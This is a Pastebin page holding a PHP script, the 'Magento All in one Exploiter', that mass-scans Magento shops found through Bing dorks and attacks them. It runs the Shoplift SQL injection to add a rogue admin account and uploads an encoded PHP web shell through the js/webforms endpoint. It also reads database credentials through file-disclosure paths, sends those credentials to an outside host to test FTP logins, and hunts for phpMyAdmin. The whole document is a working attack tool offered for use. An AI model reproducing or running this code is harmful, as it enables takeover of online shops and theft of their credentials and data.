API tools faq
paste
GLADzTeguhID

Magento all Exploit

GLADzTeguhID
Mar 25th, 2019
803
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 15.75 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. function logo()
  3. {
  4.     $logo = "=======================================================\n";
  5.     $logo .= "Magento All in one Exploiter\n";
  6.     $logo .= "Created By Pak Haxor Special Thank To Papah Crew\n"; 
  7.     $logo .= "Thank To Yogyakarta BlackHat & All Coder Indonesian\n";  
  8.     $logo .= "=======================================================\n";
  9.     echo $logo;
  10. }
  11. function CurlPost($url, $post = false,$type=null){
  12.         if($type == 1)
  13.         {
  14.             $ch = curl_init();
  15.             curl_setopt ($ch, CURLOPT_URL, $url);
  16.             curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  17.             curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  18.             curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  19.             curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  20.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  21.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  22.             curl_setopt ($ch, CURLOPT_POST, 1);
  23.             $headers  = array();
  24.             $headers[] = 'Accept-Encoding: gzip, deflate';
  25.             $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  26.             curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  27.             curl_setopt ($ch, CURLOPT_HEADER, 1);
  28.             $result = curl_exec ($ch);
  29.             curl_close($ch);
  30.             return $result;
  31.         }
  32.         if($type == 2)
  33.         {
  34.             $ch = curl_init();
  35.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  36.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  37.         curl_setopt($ch, CURLOPT_URL, $url);
  38.         curl_setopt($ch, CURLOPT_HEADER, 0);
  39.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  40.         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  41.         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  42.         if($post !== false){
  43.             $isi = '';
  44.             foreach($post as $key=>$value){
  45.                 $isi .= $key.'='.$value.'&';
  46.             }
  47.             rtrim($isi, '&');
  48.             curl_setopt($ch, CURLOPT_URL, $url);
  49.             curl_setopt($ch, CURLOPT_POST, count($isi));
  50.             curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  51.             curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
  52.         }
  53.         $data = curl_exec($ch);
  54.         curl_close($ch);
  55.         return $data;
  56.         }
  57.     }
  58.  
  59. function Jswebforms($site,$file)
  60. {
  61.     $post = array('files[]'=>"@$file") ;
  62.     $ch = curl_init();
  63.     curl_setopt ($ch, CURLOPT_URL, "$site/js/webforms/upload/");
  64.     curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  65.     curl_setopt($ch, CURLOPT_POST, true);
  66.     curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
  67.     curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  68.     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  69.     curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  70.     $data = curl_exec($ch);
  71.     curl_close($ch);
  72.     $json = json_decode($data);
  73.     if(isset($json[0]->url))
  74.     {
  75.         $shell = get_content($json[0]->url);
  76.         return (preg_match("/Pak Haxor/",$shell)) ? $json[0]->url : false;
  77.     }
  78. }
  79. function createshell()
  80. {
  81.     $ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
  82.     $shell = "PD9waHANCmVjaG8gYmFzZTY0X2RlY29kZSgiVUdGcklFaGhlRzl5Iik7DQplY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7DQplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2lkeCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz4NCjwvZm9ybT4iOw0KaWYoJF9QT1NUWyd1cGxvYWQnXSkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2lkeCddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydpZHgnXVsnbmFtZSddKSkgew0KCWVjaG8gInN1a3NlcyI7DQoJfSBlbHNlIHsNCgllY2hvICJnYWdhbCI7DQoJfQ0KfQ0KPz4=";
  83.     for($i=0;$i<count($ext);$i++)
  84.     {
  85.         $fp = fopen("sj.".$ext[$i], 'a+');
  86.         fwrite($fp, base64_decode($shell));
  87.         fclose($fp);
  88.     }
  89.     return $ext;
  90. }
  91. function get_content($url)
  92. {
  93.     return @file_get_contents($url);
  94. }
  95. function FinderPhpMyAdmin($site)
  96. {
  97.     $x = 1;
  98.     $list = array(
  99.     '/phpMyAdmin/',
  100.     '/phpmyadmin/',
  101.     '/PMA/',
  102.     '/pma/',
  103.     '/dbadmin/',
  104.     '/mysql/',
  105.     '/myadmin/',
  106.     '/phpmyadmin2/',
  107.     '/phpMyAdmin2/',
  108.     '/phpMyAdmin-2/',
  109.     '/php-my-admin/',
  110.     '/phpMyAdmin-2.2.3/',
  111.     '/phpMyAdmin-2.2.6/',
  112.     '/phpMyAdmin-2.5.1/',
  113.     '/phpMyAdmin-2.5.4/',
  114.     '/phpMyAdmin-2.5.5-rc1/',
  115.     '/phpMyAdmin-2.5.5-rc2/',
  116.     '/phpMyAdmin-2.5.5/',
  117.     '/phpMyAdmin-2.5.5-pl1/',
  118.     '/phpMyAdmin-2.5.6-rc1/',
  119.     '/phpMyAdmin-2.5.6-rc2/',
  120.     '/phpMyAdmin-2.5.6/',
  121.     '/phpMyAdmin-2.5.7/',
  122.     '/phpMyAdmin-2.5.7-pl1/',
  123.     '/phpMyAdmin-2.6.0-alpha/',
  124.     '/phpMyAdmin-2.6.0-alpha2/',
  125.     '/phpMyAdmin-2.6.0-beta1/',
  126.     '/phpMyAdmin-2.6.0-beta2/',
  127.     '/phpMyAdmin-2.6.0-rc1/',
  128.     '/phpMyAdmin-2.6.0-rc2/',
  129.     '/phpMyAdmin-2.6.0-rc3/',
  130.     '/phpMyAdmin-2.6.0/',
  131.     '/phpMyAdmin-2.6.0-pl1/',
  132.     '/phpMyAdmin-2.6.0-pl2/',
  133.     '/phpMyAdmin-2.6.0-pl3/',
  134.     '/phpMyAdmin-2.6.1-rc1/',
  135.     '/phpMyAdmin-2.6.1-rc2/',
  136.     '/phpMyAdmin-2.6.1/',
  137.     '/phpMyAdmin-2.6.1-pl1/',
  138.     '/phpMyAdmin-2.6.1-pl2/',
  139.     '/phpMyAdmin-2.6.1-pl3/',
  140.     '/phpMyAdmin-2.6.2-rc1/',
  141.     '/phpMyAdmin-2.6.2-beta1/',
  142.     '/phpMyAdmin-2.6.2-rc1/',
  143.     '/phpMyAdmin-2.6.2/',
  144.     '/phpMyAdmin-2.6.2-pl1/',
  145.     '/phpMyAdmin-2.6.3/',
  146.     '/phpMyAdmin-2.6.3-rc1/',
  147.     '/phpMyAdmin-2.6.3/',
  148.     '/phpMyAdmin-2.6.3-pl1/',
  149.     '/phpMyAdmin-2.6.4-rc1/',
  150.     '/phpMyAdmin-2.6.4-pl1/',
  151.     '/phpMyAdmin-2.6.4-pl2/',
  152.     '/phpMyAdmin-2.6.4-pl3/',
  153.     '/phpMyAdmin-2.6.4-pl4/',
  154.     '/phpMyAdmin-2.6.4/',
  155.     '/phpMyAdmin-2.7.0-beta1/',
  156.     '/phpMyAdmin-2.7.0-rc1/',
  157.     '/phpMyAdmin-2.7.0-pl1/',
  158.     '/phpMyAdmin-2.7.0-pl2/',
  159.     '/phpMyAdmin-2.7.0/',
  160.     '/phpMyAdmin-2.8.0-beta1/',
  161.     '/phpMyAdmin-2.8.0-rc1/',
  162.     '/phpMyAdmin-2.8.0-rc2/',
  163.     '/phpMyAdmin-2.8.0/',
  164.     '/phpMyAdmin-2.8.0.1/',
  165.     '/phpMyAdmin-2.8.0.2/',
  166.     '/phpMyAdmin-2.8.0.3/',
  167.     '/phpMyAdmin-2.8.0.4/',
  168.     '/phpMyAdmin-2.8.1-rc1/',
  169.     '/phpMyAdmin-2.8.1/',
  170.     '/phpMyAdmin-2.8.2/',
  171.     '/sqlmanager/',
  172.     '/mysqlmanager/',
  173.     '/p/m/a/',
  174.     '/PMA2005/',
  175.     '/pma2005/',
  176.     '/phpmanager/',
  177.     '/php-myadmin/',
  178.     '/phpmy-admin/',
  179.     '/webadmin/',
  180.     '/sqlweb/',
  181.     '/websql/',
  182.     '/webdb/',
  183.     '/mysqladmin/',
  184.     '/mysql-admin/',
  185.     '/mya/',
  186.     );
  187.     $jumlah = count($list);
  188.     if(isset($site))
  189.     {
  190.     echo "\n[+] Searching Mysql Login : ";
  191.         foreach($list as $path => $test)
  192.         {
  193.             $ch = curl_init();
  194.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  195.             curl_setopt($ch, CURLOPT_HEADER, 1);
  196.             curl_setopt($ch, CURLOPT_URL, $site.$test);
  197.             $result = curl_exec($ch);
  198.             curl_close($ch);
  199.             if (preg_match("/200 OK/", $result))
  200.             {
  201.                 return $site.$test;
  202.                 break;
  203.             }
  204.             else if (preg_match("/401 Unauthorized/", $result))
  205.             {
  206.                 return $site.$test;
  207.             }
  208.             else
  209.             {
  210.                 echo ".";
  211.             }
  212.         }
  213.     }
  214. }
  215. function ftplogin($host,$user,$pass)
  216. {
  217.     $con = ftp_connect($host) or die("Couldn't connect");
  218.     ftp_login($con,  $user,  $pass);
  219.     return is_array(ftp_nlist($con, ".")) ? true : false;
  220. }
  221. function GetStr($start,$end,$string){
  222.         $a = explode($start,$string);
  223.         $b = explode($end,$a[1]);
  224.         return $b[0];
  225.     }
  226. function userFTP($username)
  227. {
  228.     $user = explode("_",$username);
  229.     return (isset($user[1])) ? $user[1] : $user[0];
  230. }
  231.  
  232. function ReadStdin($prompt, $valid_inputs=null, $default = '') {
  233.     while(!isset($input) || (is_array($valid_inputs) && !in_array($input, $valid_inputs)) || ($valid_inputs == 'is_file' && !is_file($input))) {
  234.         echo $prompt;
  235.         $input = strtolower(trim(fgets(STDIN)));
  236.         break;
  237.         if(empty($input) && !empty($default)) {
  238.             $input = $default;
  239.         }
  240.     }
  241.     return $input;
  242. }
  243.  
  244. function LoginDownloader($url){
  245.         $link = parse_url($url);
  246.         if(isset($link["scheme"]))
  247.         {
  248.             $data = CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  249.                         array("username" => "pak",
  250.                               "password" => "haxor123"),2
  251.                         );
  252.         }
  253.         else
  254.         {
  255.             $data = CurlPost("http://$url",
  256.                         array("username" => "pak",
  257.                               "password" => "haxor123"),2
  258.                         );
  259.         }
  260.         if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  261.             $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  262.             $smtp = (preg_match("/Smtp/",$data) ? "Yes" : "No");
  263.             $filemanager = (preg_match("/File_System/",$data) ? "Yes":"No");
  264.             return $permission.
  265.             "\n     ==> Smtp : $smtp".
  266.             "\n     ==> Filemanager : $filemanager";
  267.         } else {
  268.             return "Failed";
  269.         }
  270.     }
  271. function getDomain($keyword)
  272. {
  273.     if($keyword == 1)
  274.     {
  275.         return array($argv[1]);
  276.     }
  277. }
  278. function SearchEngine($dork)
  279. {
  280.         $list = array();
  281.         for($i=0;$i<=1000;$i+=10){
  282.                     $search = CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&first=".$i,false,2);
  283.                     preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
  284.                     foreach($m[1] as $link){
  285.                         if(!preg_match("/live|msn|bing|microsoft/",$link)){
  286.                             if(!in_array($link,$list)){
  287.                                 $url = parse_url($link);
  288.                                 $target = (!isset($url["scheme"]) ? "http://".$link : $url["scheme"]."://".$url["host"]);
  289.                                 if(preg_match('/http/',$target))
  290.                                 {
  291.                                     $reparse = parse_url($target);
  292.                                     $domain = (!isset($reparse["scheme"]) ? $target : $reparse["host"]);
  293.                                 }
  294.                                 $list[] = $domain;
  295.                             }
  296.                         }
  297.                     }
  298.                     echo ".";
  299.                 }
  300.                 echo "\nDitemukan : ".count(array_unique($list))."\n";
  301.                 return array_unique($list);
  302. }
  303. logo();
  304. $getdomains = ReadStdin("[1] Making Dork\n[2] Making List\n[3] Making Url\nSelected : ", array('1','2','3'));
  305.     if(!isset($getdomains) or $getdomains > 3)
  306.     {
  307.         echo "Wrong Press !!!";
  308.         die();
  309.     }
  310.     if($getdomains == 1)
  311.     {
  312.         $dorker = ReadStdin("[1] Bing\nSelected : ",array("keyword"));
  313.         if($dorker == 1)
  314.         {
  315.             $url1 = ReadStdin("Masukkan Dork : ",array("keyword"));
  316.             echo "Grabbing : ";
  317.             $get = SearchEngine($url1);
  318.         }
  319.     }
  320.     if($getdomains == 2)
  321.     {
  322.         $url2 = ReadStdin("Masukkan Namafile TXT : ",array("keyword"));
  323.         $get = file($url2);
  324.     }
  325.     if($getdomains == 3)
  326.     {
  327.         $url3 = ReadStdin("Masukkan url : ",array("keyword"));
  328.         $get = array($url3);
  329.     }
  330.  
  331. $addadmin = ReadStdin('Apakah Anda Ingin Menggunakan Shoplift(Magento Add Admin) ? (Y/N): ', array('Y', 'N'));
  332. $jswebforms = ReadStdin('Apakah Anda Ingin Menggunakan Magento Js Webforms ? (Y/N): ', array('Y', 'N'));
  333. $lfdScanning = ReadStdin('Apakah Anda Ingin Menggunakan LFD Scanning + magmi + amasty ? (Y/N): ', array('Y', 'N'));
  334. $ftpScanning = ReadStdin('Apakah Anda Ingin Menggunakan FTP Scanning ? (Y/N): ', array('Y', 'N'));
  335. //==================GET FROM FILEDATA====================//
  336. $x=1;
  337. foreach($get as $domain)
  338. {
  339.     if($getdomains == 2)
  340.     {
  341.         $domain = str_replace("\r", "", $domain);
  342.         $domain = str_replace("\n", "", $domain);
  343.     }
  344.     echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  345.     echo "Scanning Url : $domain\n";
  346.     if($addadmin == "y")
  347.     {
  348.         echo "[+] Add Admin Status : ";
  349.         $path = "/admin/Cms_Wysiwyg/directive/index/";
  350.         $post = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoYXhvcjEyMycpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3BhaycsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3BhaycpLCdGaXJzdG5hbWUnKTs=%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  351.         $exploit = CurlPost($domain.$path,$post,1);
  352.         if(preg_match('#200 OK#', $exploit))
  353.         {
  354.             echo "SUCCESS";
  355.             echo "\n[+] Check Status Login :";
  356.             $postlogin = array("login[username]" => "pak",
  357.                               "login[password]" => "haxor123");
  358.             $postlogindownloader = array("username" => "pak",
  359.                                           "password" => "haxor123");
  360.             $checklogin = CurlPost($domain."/admin",$postlogin,2);
  361.             $downloader = LoginDownloader($domain);
  362.             if(preg_match('/<body id="html-body" class=" adminhtml-dashboard-index">/', $checklogin))
  363.             {
  364.                 $total = GetStr("<span class=\"price\">","</span>",$checklogin);
  365.                 $average = GetStr('<span class="nowrap" style="font-size:18px;"><span class="price">',"</span>",$checklogin);
  366.                 echo "TRUE\n";
  367.                 $message  = "====================================\n";
  368.                 $message .= "   ==> Url Login : $domain/admin\n";
  369.                 $message .= "   ==> Username : pak\n";
  370.                 $message .= "   ==> Password : haxor123\n";
  371.                 $message .= "   ==> Lifetime Sales : $total \n";
  372.                 $message .= "   ==> Average Orders : $average \n";
  373.                 $message .= "   ==> Downloader : $downloader \n";
  374.                 echo $message;
  375.                 $fp = fopen("shoplift.txt", 'a+');
  376.                 fwrite($fp, $message);
  377.                 fclose($fp);
  378.             }
  379.             else
  380.             {
  381.                 echo "FALSE\n";
  382.             }
  383.             echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
  384.         }
  385.         else
  386.         {
  387.             echo "FAILURE\n";
  388.         }
  389.     }
  390.     if($jswebforms == "y")
  391.     {
  392.         if(get_content($domain."/js/webforms/upload") == "[]")
  393.         {
  394.             echo "[+] Uploaded Shell : ";
  395.             if(!file_exists("sj.php"))
  396.             {
  397.                     $ext = createshell();
  398.             }
  399.             else
  400.             {
  401.                     $ext = array("php","php5","php7","php.j","phtml","shtml","php.pjpeg");
  402.             }
  403.             for($i=0;$i<count($ext);$i++)
  404.             {
  405.                 echo ".";
  406.                 $exploit = Jswebforms($domain,"sj.".$ext[$i]);
  407.                 if(isset($exploit))
  408.                 {
  409.                         echo "\n".$exploit." Success \n";
  410.                         $fp = fopen("jswebforms.txt", 'a+');
  411.                         fwrite($fp, $exploit."\n");
  412.                         fclose($fp);
  413.                 }
  414.             }
  415.         }
  416.         else
  417.         {
  418.             echo "[-] Webforms Not vuln\n";
  419.         }
  420.     }
  421.     if($lfdScanning == "y")
  422.     {
  423.         $path = array("Amasty" => "/app/etc/local.xml",
  424.                             "Magmi" => "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  425.                         );
  426.         echo "[+] LFD Scanning :";
  427.         foreach($path as $key => $value)
  428.         {
  429.             $url = parse_url($domain);
  430.             $target = (!isset($url["scheme"]) ? "http://".$domain : $url["scheme"]."://".$url["host"]);
  431.             $lfd = get_content($target.$value);
  432.             if(preg_match("/<host><!/",$lfd))
  433.             {
  434.                 echo "Found\n";
  435.                 $date = GetStr("<date><![CDATA[","]]></date>",$lfd);
  436.                 $host = GetStr("<host><![CDATA[","]]></host>",$lfd);
  437.                 $username = GetStr("<username><![CDATA[","]]></username>",$lfd);
  438.                 $password = GetStr("<password><![CDATA[","]]></password>",$lfd);
  439.                 $dbname = GetStr("<dbname><![CDATA[","]]></dbname>",$lfd);
  440.                 $lfdconfig = "==============[Mysql Login]===============\n";
  441.                 $lfdconfig .= "Domain : $domain\n";
  442.                 $lfdconfig .= "Date : $date\n";
  443.                 $lfdconfig .= "Host : $host\n";
  444.                 $lfdconfig .= "Username : $username\n";
  445.                 $lfdconfig .= "Password : $password\n";
  446.                 $lfdconfig .= "DatabaseName : $dbname\n";
  447.                 $lfdconfig .= "=========================================\n";
  448.                 echo $lfdconfig;
  449.                 $fp = fopen("lfdconfig.txt", 'a+');
  450.                         fwrite($fp, $lfdconfig);
  451.                         fclose($fp);
  452.                 if($ftpScanning == "y")
  453.             {
  454.                     echo "\n[+] Scanning FTP LOGIN : ";
  455.                     $url = parse_url($domain);
  456.                     $ftp = get_content("http://www.fccarolinasoccer.com/ftp.php?domain=$domain&username=".userFTP($username)."&password=$password");
  457.                 if(preg_match("/SUCCESS/",$ftp))
  458.                 {
  459.                     echo "SUCCESS\n";
  460.                     $ftpinfo = "================================\n";
  461.                     $ftpinfo .= "Host : ftp.".$url["host"]."\n";
  462.                     $ftpinfo .= "Username : ".userFTP($username)."\n";
  463.                     $ftpinfo .= "Password : ".$password."\n";
  464.                     $ftpinfo .= "================================\n";
  465.                     echo $ftpinfo;
  466.                     $fp = fopen("ftpmagento.txt", 'a+');
  467.                         fwrite($fp, $ftpinfo);
  468.                         fclose($fp);
  469.                 }
  470.                 else
  471.                 {
  472.                     echo "Failure\n";
  473.                 }
  474.             }
  475.                 $finderPhpmyadmin = FinderPhpMyAdmin("$domain");
  476.                 if(isset($finderPhpmyadmin))
  477.                 {
  478.                     $fp = fopen("lfdconfig.txt", 'a+');
  479.                         fwrite($fp, "\nPath Mysql login : $finderPhpmyadmin");
  480.                         fclose($fp);
  481.                 echo "\n Path Mysql login : $finderPhpmyadmin";
  482.                 }
  483.                 else
  484.                 {
  485.                     echo "\n[-] Path Mysql Not found";
  486.                 }
  487.             break;
  488.             }
  489.             else
  490.             {
  491.                 echo " \n==>[$key] Not Found\n";
  492.             }
  493.         }
  494.     }
  495.  
  496. }
  497. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!